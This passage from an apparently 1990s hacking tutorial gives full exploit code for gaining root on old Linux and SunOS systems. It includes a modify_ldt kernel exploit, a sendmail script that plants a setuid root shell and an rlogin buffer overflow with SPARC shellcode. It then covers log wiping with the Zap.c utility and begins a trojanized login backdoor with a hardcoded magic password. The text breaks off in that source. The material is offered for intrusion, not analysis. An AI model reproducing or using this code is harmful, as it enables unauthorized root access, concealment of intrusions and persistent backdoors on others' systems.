!!!)/* this is a hack of a hack.  a valid System.map was needed to get this    sploit to werk.. but not any longer.. This sploit will give you root   if the modify_ldt bug werks.. which I beleive it does in any kernel    before 1.3.20 ..      QuantumG*//* original code written by Morten Welinder. * * this required 2 hacks to work on the 1.2.13 kernel that I've tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed. * 2. the _task in the System.map file has no leading underscore. * I am not sure at what point these were changed, if you are * using this on a newer kernel compile with NEWERKERNEL defined. *                                          -ReD */#include <linux/ldt.h>#include <stdio.h>#include <linux/unistd.h>#include <signal.h>#ifdef NEWERKERNEL#include <asm/sigcontext.h>#endif#define __KERNEL__#include <linux/sched.h>#include <linux/module.h>static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)#define KERNEL_BASE 0xc0000000/* ------------------------------------------------------------------------ */static __inline__ unsigned char__farpeek (int seg, unsigned ofs){  unsigned char res;  asm ("mov %w1,%%gs ; gs; movb (%2),%%al"       : "=a" (res)       : "r" (seg), "r" (ofs));  return res;}/* ------------------------------------------------------------------------ */static __inline__ void__farpoke (int seg, unsigned ofs, unsigned char b){  asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"       : /* No results.  */       : "r" (seg), "r" (ofs), "r" (b));}/* ------------------------------------------------------------------------ */voidmemgetseg (void *dst, int seg, const void *src, int size){  while (size-- > 0)    *(char *)dst++ = __farpeek (seg, (unsigned)(src++));}/* ------------------------------------------------------------------------ */voidmemputseg (int seg, void *dst, const void *src, int size){  while (size-- > 0)    __farpoke (seg, (unsigned)(dst++), *(char *)src++);}/* ------------------------------------------------------------------------ */intmain (){  int stat, i,j,k;  struct modify_ldt_ldt_s ldt_entry;  FILE *syms;  char line[100];  struct task_struct **task, *taskptr, thistask;  struct kernel_sym blah[4096];  printf ("Bogusity checker for modify_ldt system call.\n");  printf ("Testing for page-size limit bug...\n");  ldt_entry.entry_number = 0;  ldt_entry.base_addr = 0xbfffffff;  ldt_entry.limit = 0;  ldt_entry.seg_32bit = 1;  ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;  ldt_entry.read_exec_only = 0;  ldt_entry.limit_in_pages = 1;  ldt_entry.seg_not_present = 0;  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));  if (stat)    /* Continue after reporting error.  */    printf ("This bug has been fixed in your kernel.\n");  else    {      printf ("Shit happens: ");      printf ("0xc0000000 - 0xc0000ffe is accessible.\n");    }  printf ("Testing for expand-down limit bug...\n");  ldt_entry.base_addr = 0x00000000;  ldt_entry.limit = 1;  ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;  ldt_entry.limit_in_pages = 0;  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));  if (stat)    {      printf ("This bug has been fixed in your kernel.\n");      return 1;    }  else    {      printf ("Shit happens: ");      printf ("0x00000000 - 0xfffffffd is accessible.\n");    }  i = get_kernel_syms(blah);  k = i+10;  for (j=0; j<i; j++)    if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;  if (k==i+10) { printf("current not found!!!\n"); return(1); }  j=k;  taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);  memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));    taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);  memgetseg (&thistask, 7, taskptr, sizeof (thistask));    if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }  printf("Current process is %i\n",thistask.pid);  taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);  memgetseg (&thistask, 7, taskptr, sizeof (thistask));    if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }  printf("Parent process is %i\n",thistask.pid);  thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;  thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;  memputseg (7, taskptr, &thistask, sizeof (thistask));  printf ("Shit happens: parent process is now root process.\n");  return 0;};c.) Other linux versions:Sendmail exploit:#/bin/sh###                                   Hi !#                This is exploit for sendmail smtpd bug#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).#         This shell script does a root shell in /tmp directory.#          If you have any problems with it, drop me a letter.#                                Have fun !###                           ----------------------#               ---------------------------------------------#    -----------------   Dedicated to my beautiful lady   ------------------#               ---------------------------------------------#                           ----------------------##          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su###echo   'main()                                                '>>leshka.cecho   '{                                                     '>>leshka.cecho   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.cecho   '}                                                     '>>leshka.c##echo   'main()                                                '>>smtpd.cecho   '{                                                     '>>smtpd.cecho   '  setuid(0); setgid(0);                               '>>smtpd.cecho   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.cecho   '}                                                     '>>smtpd.c##cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c./leshkakill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`rm leshka.c leshka smtpd.c /tmp/smtpdecho "Now type:   /tmp/sh"SUNOS:Rlogin exploit:(arghh!)#include <stdio.h>#include <stdlib.h>#include <sys/types.h>#include <unistd.h>#define BUF_LENGTH      8200#define EXTRA           100#define STACK_OFFSET    4000#define SPARC_NOP       0xa61cc013u_char sparc_shellcode[] ="\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13""\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e""\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a""\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc""\x82\x10\x20\x3b\x91\xd4\xff\xff";u_long get_sp(void){  __asm__("mov %sp,%i0 \n");}void main(int argc, char *argv[]){  char buf[BUF_LENGTH + EXTRA];  long targ_addr;  u_long *long_p;  u_char *char_p;  int i, code_length = strlen(sparc_shellcode);  long_p = (u_long *) buf;  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)    *long_p++ = SPARC_NOP;  char_p = (u_char *) long_p;  for (i = 0; i < code_length; i++)    *char_p++ = sparc_shellcode[i];  long_p = (u_long *) char_p;  targ_addr = get_sp() - STACK_OFFSET;  for (i = 0; i < EXTRA / sizeof(u_long); i++)    *long_p++ = targ_addr;  printf("Jumping to address 0x%lx\n", targ_addr);  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);  perror("execl failed");}Want more exploits? Get 'em from other sites (like rootshell,dhp.com/~fyodor, etc...).Step 3: Covering your tracks:______For this you could use lots of programs like zap, utclean, and lots ofothers...Watch out, ALWAYS after you cloaked yourself to see if it worked do a:victim1:~$ who...(crap)...victim1:~$ finger...;as;;sda...victim1:~$w...If you are still not cloaked, look for wtmpx, utmpx and other stuff likethat. The only cloaker (that I know) that erased me even from wtmpx/utmpxwas utclean. But I don't have it right now, so ZAP'll have to do the job./*      Title:  Zap.c (c) rokK Industries   Sequence:  911204.B     Syztems:  Kompiles on SunOS 4.+       Note:  To mask yourself from lastlog and wtmp you need to be root,              utmp is go+w on default SunOS, but is sometimes removed.    Kompile:  cc -O Zap.c -o Zap        Run:  Zap <Username>        Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the              entered Username. It also Zeros out the last login data for              the specific user, fingering that user will show 'Never Logged              In'       Usage:  If you cant find a usage for this, get a brain.*/ #include <sys/types.h>#include <stdio.h>#include <unistd.h>#include <fcntl.h>#include <utmp.h>#include <lastlog.h>#include <pwd.h> int f; void kill_tmp(name,who)char *name,     *who;{    struct utmp utmp_ent;   if ((f=open(name,O_RDWR))>=0) {     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);                 write (f, &utmp_ent, sizeof (utmp_ent));            }     close(f);  }} void kill_lastlog(who)char *who;{    struct passwd *pwd;    struct lastlog newll;      if ((pwd=getpwnam(who))!=NULL) {         if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);            bzero((char *)&newll,sizeof( newll ));            write(f, (char *)&newll, sizeof( newll ));            close(f);        }     } else printf("%s: ?\n",who);} main(argc,argv)int  argc;char *argv[];{    if (argc==2) {        kill_tmp("/etc/utmp",argv[1]);        kill_tmp("/usr/adm/wtmp",argv[1]);        kill_lastlog(argv[1]);        printf("Zap!\n");    } else    printf("Error.\n");}Step 4: Keeping that account._______This usually means that you'll have to install some programs to give youaccess even if the root has killed your account...(DAEMONS!!!) =>|-@ Here is an example of a login daemon from the DemonKit (good job,fellows...)LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's dateof creation. (use touch --help to see how!)/*This is a simple trojanized login program, this was designed for Linuxand will not work without modification on linux. It lets you login aseither a root user, or any ordinary user by use of a 'magic password'.It will also prevent the login from being logged into utmp, wtmp, etc.You will effectively be invisible, and not be detected except via 'ps'.*/#define BACKDOOR                    "password"int     krad=0;/* This program is derived from 4.3 BSD software and is   subject to the copyright notice below.   The port to HP-UX has been motivated by the incapability   of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.   Changes:   - General HP-UX portation. Use of facilities not available     in HP-UX (e.g. setpriority) has been eliminated.     Utmp/wtmp handling has been ported.   - The program uses BSD command line options to be used     in connection with e.g. 'rlogind' i.e. 'new login'.   - HP features left out:          logging of bad login attempts in /etc/btmp,				    they are sent to syslog				    password expiry				    '*' as login shell, add it if you need it   - BSD features left out:         quota checks				    password expiry				    analysis of terminal type (tset feature)   - BSD features thrown in:        Security logging to syslogd.                                    This requires you to have a (ported) syslog				    system -- 7.0 comes with syslog				    				    'Lastlog' feature.   - A lot of nitty gritty details has been adjusted in favour of     HP-UX, e.g. /etc/securetty, default paths and the environment     variables assigned by 'login'.   - We do *nothing* to setup/alter tty state, under HP-UX this is     to be done by getty/rlogind/telnetd/some one else.   Michael Glad (glad@daimi.dk)   Computer Science Department   Aarhus University   Denmark   1990-07-04   1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:              - now explictly sets non-blocking mode on descriptors	      - strcasecmp is now part of HP-UX   1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12   From 1992 till now (1995) this code for Linux has been maintained at   ftp.daimi.aau.dk:/pub/linux/poe/*/   /* * Copyright (c) 1980, 1987, 1988 The Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley.  The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */#ifndef lintchar copyright[] ="@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\ All rights reserved.\n";#endif /* not lint */#ifndef lintstatic char sccsid[] = "@(#)login.c	5.40 (Berkeley) 5/9/89";#endif /* not lint *//* * login [ name ] * login -h hostname	(for telnetd, etc.) * login -f name	(for pre-authenticated login: datakit, xterm, etc.) *//* #define TESTING */#ifdef TESTING#include "param.h"#else#include <sys/param.h>#endif#include <ctype.h>#include <unistd.h>#include <getopt.h>#include <memory.h>#include <sys/stat.h>#include <sys/time.h>#include <sys/resource.h>#include <sys/file.h>#include <termios.h>#include <string.h>#define index strchr#define rindex strrchr#include <sys/ioctl.h>#include <signal.h>#include <errno.h>#include <grp.h>#include <pwd.h>